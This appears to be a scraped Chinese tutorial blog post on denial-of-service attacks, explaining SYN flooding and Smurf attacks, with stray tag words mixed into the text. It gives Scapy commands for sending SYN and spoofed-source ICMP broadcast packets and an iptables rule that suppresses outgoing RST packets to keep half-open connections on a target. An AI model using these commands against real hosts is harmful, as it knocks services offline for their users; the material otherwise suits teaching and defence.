Dos拒绝服务Syn-Flood泛洪攻击--Smurf 攻击(一)

Dos拒绝服务
利用程序漏洞或一对一资源耗尽的Denial of Service 拒绝服务
DDos 分布式拒绝服务 多对一服务器

 


 

Syn-Flood泛洪攻击tcp

发送syn包欺骗服务器创建半链接分布式

攻击代码,利用scapyspa

Scapy
– i=IP()
– i.dst=1.1.1.1
– i.display()
– t=TCP()
– sr1(i/t,verbose=1,timeout=3)
– sr1(IP(dst=1.1.1.1)/TCP())

防火墙配置关闭本机发送rst包操作系统

RST包的做用:告诉服务器我不和你创建链接,计算机在接收到服务器的ack+syn包的时候,系统会自动发送RSTcode

iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 1.1.1.1 -j DROP //指定IP,关闭本地发送Rst包
netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}' //查看本机tcp链接数

 

 

Smurf 攻击
最古老的DDos攻击技术
技术原理:利用icmp包,伪造源IP发广播包,广播局域网内的全部计算机回复广播包给伪造的IP,形成攻击对伪造IP的效果
对如今的操做系统几乎无效(不响应广播包)blog

攻击实现代码:ip

Scapy
– i=IP()
– i.dst="1.1.1.255"
– p=ICMP()
– p.display()
– r=(i/p)
– send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)
相关文章
相关标签/搜索